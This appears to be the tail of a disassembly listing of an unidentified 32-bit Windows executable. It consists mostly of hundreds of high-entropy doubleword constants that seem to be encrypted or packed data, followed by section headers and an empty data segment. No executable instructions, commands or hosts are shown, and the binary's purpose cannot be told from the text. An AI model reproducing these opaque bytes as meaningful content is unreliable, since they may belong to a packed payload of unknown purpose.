dd 0BD5FC2D7h, 1DAD3834h, 711CB685h, 0A771D2E9h, 2ABE291Ah
dd 540792A7h, 0BD45C1C9h, 18A41D10h, 64139C85h, 0A247C7C0h
dd 1D9E0C3Ch, 4D149A88h, 0A756C3D2h, 0DB9140Eh, 471A8A98h
dd 0BB49F8C5h, 0DEAB373Ch, 431F7453h, 0BD5BCACFh, 0E2BA2507h
dd 73E46F6Bh, 0B358DBECh, 0FCB12836h, 41C56261h, 0BE46DDDFh
dd 0E7B2293Ah, 7FDB7A68h, 0DF46C7D8h, 0DE982F0Eh, 70D84D5Fh
dd 825CFAEFh, 0E3920C2Dh, 60D17B6Ch, 8C5CD4DCh, 0CDB81516h
dd 5CE26079h, 806DC9D9h, 0FF8E1A11h, 43D64960h, 9551ACC9h
dd 0C6EA1E00h, 58F16A71h, 9A2E8BCFh, 94EF6F13h, 7BCA4B12h
dd 9934D8ADh, 0FB990A06h, 2AE8703Ah, 9D2BA7CDh, 0F69A5B0Ah
dd 0D9F4E70h, 0CF018F88h, 0E0930C0Bh, 2FD1477Bh, 0B41E9AC9h
dd 0D68F5B3Dh, 67EB6E55h, 8139A4E3h, 94CF0B05h, 49A8C249h
dd 740ED5C7h, 90DF679Eh, 242EEB1Eh, 0F756E8DCh, 8F2F118Ah
dd 0A66F3011h, 9008AFD3h, 47B00C66h, 8B1030Fh, 8872E263h
dd 9789EC51h, 77C12BD8h, 2CAE5C5Fh, 0DA818C4Eh, 31136F28h
dd 0DE46E70h, 200CBEAAh, 6A930EA8h, 40EA1FD8h, 4C401C7Eh
dd 0BFBB8DCBh, 0F6D06A14h, 0DD10A2ABh, 60BC3F37h, 35F21688h
dd 5112A4A6h, 63BE40BFh, 1AC06E6Ch, 0D14496BDh, 99CE2839h
dd 2247A471h, 9A6A1B90h, 18B74034h, 156DE70Fh, 825EC993h
dd 20880211h, 5FA0EEAh, 0CF1AACBAh, 5D23C82h, 7399A3EFh
dd 38E36160h, 42E393D0h, 6AB370F0h, 22CE5F9Eh, 75CA4C43h
dd 7E36B1A0h, 890EF1D0h, 87CC0207h, 145BE463h, 29634CA2h
dd 0CE43AFB1h, 2749D706h, 0D325A2CDh, 0EB2F0451h, 2A4BD1DDh
dd 0D626A540h, 0D3960854h
dd 7F38A9B6h, 8D6DF6F8h, 7B825614h, 1FABEB97h, 0DB2C45ADh
dd 0CE8B5959h, 62D7564Bh, 48D1E6AFh, 88EA77B2h, 62D7C135h
dd 0B560B0DBh, 8ADD375Ch, 0CADF4B08h, 0D11F4726h, 7318E15Fh
dd 0BADC2D7Eh, 0D31B4620h, 156EE861h, 538F212Bh, 0FF52EEB7h
dd 0C1E66863h, 4E07EB5Eh, 183D8F95h, 0A2C2A6F0h, 3D9EFF10h
dd 0BA15C2BBh, 0A6DF3C22h, 73D45E3Ch, 0AAD63ABDh, 7EEF4145h
dd 419B1D1Eh, 9F36BBC8h, 0FE861A02h, 0BCCE2057h, 0DF621254h
dd 7F70FE6Dh, 4AA11333h, 0A3C143F2h, 15F84A76h, 7788D19Fh
dd 66B080C5h, 9ECB5130h, 49A3418Fh, 40DFD4C7h, 0A0CE992Ch
dd 9617A147h, 1F55E7E5h, 5CFE7189h, 0EA28E847h, 0FA58EAECh
dd 0A10528h, 51B00204h, 0DD3F4842h, 0FD57894Bh, 54D9344Dh
dd 5C8880h, 39F60B7Eh, 57851BCBh, 763A2250h, 388600A3h
dd 8B7090Dh, 0B3EFE2B2h, 0B23DAF20h, 0DE96D64h, 9C9BB48Ah
dd 0B53FBD62h, 0BD2EC26Bh, 0CA66D8F2h, 883F6D0Fh, 0D553F36h
dd 0F0971513h, 8B01E800h, 2A3A8639h, 446ADCF1h, 5626C8C4h
dd 963EB165h, 206B20h, 954199A3h, 262B7160h, 0DF910F18h
dd 0F40CD713h, 30BD1142h, 0E94B1AD9h, 42DC6266h, 72F75C09h
dd 4A0491A6h, 4F9056AFh, 75F97B07h, 7025A7A2h, 9C4EF0CFh
dd 54FED8B4h, 0B189F8C6h, 0D0118F8Fh, 0ED2A78Fh, 2774128Dh
dd 9B70A5A5h, 2E8E061Dh, 663ED2B5h, 43DAA7E4h, 81E17F15h
dd 2D7CF217h, 8A6FFAABh, 0E5852132h, 6E1A746Eh, 4ED5FCADh
dd 86E67380h, 0CE378997h, 0B52D9F83h, 88D95B93h, 0CC856D50h
dd 0EF1CAB24h, 5849D35Dh, 0B8883A17h, 0D11E720Eh, 0DB8D375Fh
dd 1C6E98F5h, 27B5B885h, 6177E96Dh, 698E2013h, 0B338D1E0h
dd 90E70F31h, 0E86E930Eh, 18C6A351h, 0A055E99Ah, 3D942605h
dd 6157CACFh, 6BEB6D74h, 0FBB7087h, 0EB4E2CBDh, 0C5B97069h
dd 72D15F5Bh, 0A101E98Dh, 0D0E7327h, 43AD3357h, 0EF4FA252h
dd 2F79766Dh, 45903AAEh, 5CF6409Ah, 74F74943h, 0B85CD496h
dd 0F34EDC2Dh, 0D0B32B71h, 1DE36655h, 0B91D97E9h, 0E1688073h
dd 0CEA91B32h, 0C2D0D909h, 30008277h, 4EAC2B49h, 0EE254CCh
dd 0FF03B560h, 7D668CA9h, 0A8B2DCFFh, 2AF9778Ah, 649EF99Ah
dd 8452DFD2h, 0AC08886Eh, 5624DAABh, 6B0BE1D5h, 0AF0A8D80h
dd 761BADD2h, 0C2E0E3E8h, 0B20C8F14h, 376CB160h, 9C9CB7DBh
dd 0B53EBC4Ah, 15E3FCB6h, 1FED8FD3h, 2DEF928Ah, 638C125Fh
dd 0B2E40B0Ah, 0BB22B42Bh, 0EB973539h, 22494161h, 2BEBC690h
dd 69F06E85h, 91642D62h, 0C116991Ah, 0E7CE04B4h, 975D10EAh
dd 0F4383C13h, 91418042h, 1A6FC1C3h, 0C6709CF3h, 0E7394A2Fh
dd 1E41DF35h, 0C5E3661Fh, 75C92ACCh, 0B4FE66F3h, 0CD2E803Dh
dd 2B985C21h, 8C06209h, 10A5A292h, 7A8CCB41h, 9AFAF9F9h
dd 0D3128461h, 0F2658E0h, 4286040Ah, 0D624A63Ch, 836790Ah
dd 0D22FD9CBh, 0E90A993Eh, 566FD957h, 9E7E3022h, 2D7B43ACh
dd 1358A8A6h, 31B123BBh, 0C944AEC5h, 0DAD85A5Bh, 0F211F955h
dd 522F819Dh, 7CF7919h, 5B7469Dh, 573DE4B3h, 0A89AEB55h
dd 3F6ACD1Eh, 0F134FDB7h, 0C4F3612Bh, 1DC9040Fh, 0EAD93ABFh
dd 0C1EC86A2h, 2BB45605h, 6A6B8F46h, 0A2CB96D8h, 3D8FFD10h
dd 0C71BC0BBh, 0BACA1451h, 5B63632h, 0C564E698h, 0EEC81751h
dd 4BEA3E34h, 0A30D89F5h, 67A7724Bh, 73B7FB83h, 438348C1h
dd 0F0F3756Dh, 16C87118h, 0DD8B593Ch, 117D785Fh, 47923128h
dd 0E8AECFAFh, 0CFF4B21Ah, 49A522F4h, 9175F4C7h, 5FAB7E79h
dd 7B83CF8Bh, 0FB9756C9h, 0CAF46A25h, 4DAB2D28h, 0D98E6546h
dd 0F6558447h, 7C6FA5DCh, 3CDCDBFEh, 1D88D304h, 53811FD9h
dd 0EA6E7B52h, 26088A4Dh, 669AC8A4h, 6891CAD4h, 0FD5CDD80h
dd 750BADD3h, 0FDE2E3E7h, 2023F083h, 0E935C4A4h, 853C925h
dd 1AFC9D36h, 0B7DA2C47h, 0F49A1187h, 5407E0E8h, 63CBB33Ch
dd 0C1EC030Bh, 79F5AA7h, 658E6CC7h, 0E6EE4F10h, 42472F64h
dd 58ECF3AEh, 7BD66DE6h, 0C116A887h, 5BAA6E4Ah, 0E86DEF9Ch
dd 0F334F300h, 9079C641h, 1A6FC1C2h, 43DD8DECh, 71F668E2h
dd 1D71F3EFh, 0E7E21B5Dh, 9DC84A77h, 0DF8C0BFAh, 0CC1A62C3h
dd 5935F9C7h, 0DC23F7C5h, 0FF0CAF34h, 8534CD4Dh, 26CC7DF7h
dd 57ABA4A4h, 7DFE6053h, 0D62FFB91h, 0E508FB32h, 8F10D753h
dd 2C7B597Ah, 88E683AAh, 0D3D13E06h, 2E16016Bh, 8CE9ABACh
dd 0AE24C2A7h, 0C8020333h, 0EEA8A151h, 0ED85A5Eh, 2B40180h
dd 0D5A23CB0h, 4DB6D6Ch, 4B71A92h, 8A60E5B2h, 1E21305Eh
dd 36BA201Ch, 0EDCA4F37h, 8DE563E4h, 0C78D650Bh, 0D408BD03h
dd 9E719962h, 0B9902221h, 62344240h, 91E76A8Dh, 0C889086h
dd 210DC08Ah, 0C3BBAF65h, 6F927240h, 0DA467643h, 126F58h
dd 40A930E6h, 684B063Bh, 97F071AFh, 0C715D726h, 0EE77F9DFh
dd 0F1A2243Dh, 44902108h, 0B5DF3392h, 1EF64842h, 38262BD9h
dd 7B4DCFC7h, 0ADC958F5h, 32EE41Bh, 94036AFEh, 4DCF7E72h
dd 0BB5FEB1Eh, 73DA343Fh, 0A1CFB15Bh, 0F4976694h, 0F856C306h
dd 65015645h, 0AE59C1D5h, 0CB7E5E44h, 0A8C68749h, 0ABB77892h
dd 0ADD1E833h, 0E9BF8564h, 1C64353Ch, 27720B8h, 0F2300DAFh
dd 0A1D8515Ch, 8728FDA2h, 0C20D82F8h, 67F3B1F1h, 477A752h
dd 0F78380C7h, 874DC379h, 8F5E26FFh, 0B620A293h, 253767F7h
dd 85EEE5FBh, 0B9129433h, 557D8004h, 2047DCD0h, 8D3AA6A0h
dd 2CB40C1Ah, 63078397h, 0D17FB6F0h, 60CF2B5Bh, 7004D3CBh
dd 0A775FBE6h, 0EB63560h, 6D07D3D6h, 0EA20ECE3h, 3BB2066Ch
dd 6C1D9D9Ch, 0A675B0FBh, 1E72520h, 764CDA92h, 0EB3C91A0h
dd 2AE253Eh, 244CA9Ch, 0A949C7C8h, 48F13A24h, 5C038AD7h
dd 0F31FC1CFh, 18BC3F2Dh, 1843899Fh, 0FB189884h, 1EA2343Bh
dd 26459890h, 5CD823A3h, 0B2E24FD8h, 0AE30B000h, 77DBAF42h
dd 0BB545E22h, 41F34876h, 50EF5AD8h, 9D55D1A7h, 81843634h
dd 0D8C63293h, 66AEF3A9h, 46A83686h, 0DE753F46h, 5501BF78h
dd 7AC831D7h, 940EEF7h, 641F4810h, 378D0D26h, 0E338E2DDh
dd 7F0C3D61h, 4D6FEDF1h, 0FEB63697h, 1DE75953h, 0F4B8143Ah
dd 0D4024DF7h, 154E9F98h, 3CE895C9h, 0CEF47636h, 67116F57h
dd 0F012D8B6h, 56C9CD56h, 96C05C96h, 724395E8h, 8C7B6576h
dd 0E2CF7319h, 63B32361h, 9B16F06Bh, 0EED84481h, 30A218C5h
dd 7A702C2Bh, 0CF7CBD6Eh, 47A5172Ah, 0B60897F8h, 0A3CE0A71h
dd 49FA694Fh, 0A76FEB3h, 9DFF7E8Ch, 4BE67956h, 0A76BCABDh
dd 0D702D43Dh, 1DEF0D2Ah, 7F56DB9Ch, 59FA7939h, 61E2B6DAh
dd 0CEB7DEFFh, 56F61592h, 69B7BDD8h, 4311A885h, 522D0871h
dd 8BC7D5h, 0C2FB696h, 50F29205h, 19EF07D2h, 826CD7EBh
dd 4DF16E95h, 9E96C0Dh, 0FE1E894h, 86EF6D79h, 9D92D6E8h
dd 88681621h, 47ED6973h, 75569205h, 0E769EBE1h, 44EB68D4h
dd 66C042D1h, 0FFEAB0E4h, 0BE26B1A9h, 69C376D5h, 27928BE7h
dd 0F13B2F18h, 0E5A0460Fh, 4BD271C8h, 0C51AACA6h, 0C12E4237h
dd 0F28E0C13h, 0C71C9F8Ah, 3FF6CB23h, 16F6FAAAh, 411EA09Dh
dd 0ABC97016h, 714E7695h, 35A5ADDAh, 8FCC4E4Bh, 477EFB5h
dd 552DA4A2h, 7BCE50A5h, 2525B80Fh, 0D3C522AAh, 515251h
dd 0A5BDDDCh, 2A2A788h, 69D25454h, 0D2820258h, 0D9E128A4h
dd 0C65F5657h, 3FCA890Ah, 0DF586C86h, 833C996Ah, 7B0ACD07h
dd 0F6AB39BFh, 60DA6C6Bh
dd 0CC79F550h, 0DF311C59h, 0AD40D45Dh, 36893B38h, 0D1049D2Eh
dd 708E8A5Fh, 0B383F1F5h, 0E337B93Ah, 0BEC0D0EAh, 6704113Ch
dd 0DE4BF8Bh, 6F199534h, 7113697Ch, 0E73DDF9Dh, 0C417E085h
dd 0B0816D13h, 0D950C20Eh, 84966D67h, 3F9EE9ABh, 4EB092BDh
dd 940C70D8h, 1FC4B9E7h, 7F77C7EDh, 9870F3E6h, 0CAF82016h
dd 10B65051h, 7F259F92h, 0CEFBDCE7h, 0BB4FC289h, 9AB9F77Fh
dd 0CE8C6531h, 0F34F8E42h, 0BEBDBA71h, 6987093Ch, 7E7A9F4Eh
dd 25759039h, 4B9A1C39h, 845D9DF0h, 0AB4B0A76h, 0CDBD6D20h
dd 715882AFh, 9634A9FDh, 59F23324h, 0CE0B9ECEh, 8B8CEDA9h
dd 0CB1BA43h, 30595D51h, 0A3098B4Eh, 0A849A3AEh, 20D51D2Ah
dd 500BBDB1h, 6A9B54B8h, 19D71BD8h, 4D0DBFB4h, 6D92F6A5h
dd 2E96BDBh, 380FA1B7h, 508B2EA6h, 6634B9DEh, 0BFA46C8Ah
dd 9CBD0F06h, 3F448F74h, 0BCA66A8Dh, 99BF7109h, 22412171h
dd 41A01A90h, 96C17312h, 255CED52h, 54E8CF93h, 6CF36962h
dd 28695569h, 7199BA6h, 6FC547AAh, 1A1AAFEDh, 0EDF67018h
dd 829F4975h, 66F735FFh, 4F1DAF89h, 0BD4A8888h, 0E07B060Ch
dd 0FD0AD91Ah, 68F68E4Bh, 5176D2F6h, 0ACA0C5BEh, 0AA1436Ah
dd 0CF18E98Ch, 2CDC5A61h, 25275424h, 0C2850301h, 29DA587Ah
dd 0AC2E7D35h, 3F48A887h, 0D9278913h, 213B3557h, 5A80FEFDh
dd 0FF6E2794h, 7963D569h, 0BA82342Ah, 5C4BA7FFh, 0FBDB5D61h
dd 33ED5123h, 54304DB1h, 0D8DC3499h, 9C1DF558h, 6233859Fh
dd 0B25E699Bh, 6BB43256h, 25B5BBC0h, 73EA8C65h, 4666EFF3h
dd 84C64448h, 9081DFA0h, 8A7A130Eh, 0E73C9701h, 92F88265h
dd 1D561610h, 0E90F79BBh, 97036D67h, 0FD971912h, 0BFCFC499h
dd 0B8237C4Dh, 3D9AE497h, 0EDADA7A6h, 13F1736Bh, 1EAD3B42h
dd 2C9D04Ah, 9AC45DDAh, 0BA4E25F0h, 0F589AC3Ch, 150Dh dup(0)
seg002 ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 412000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start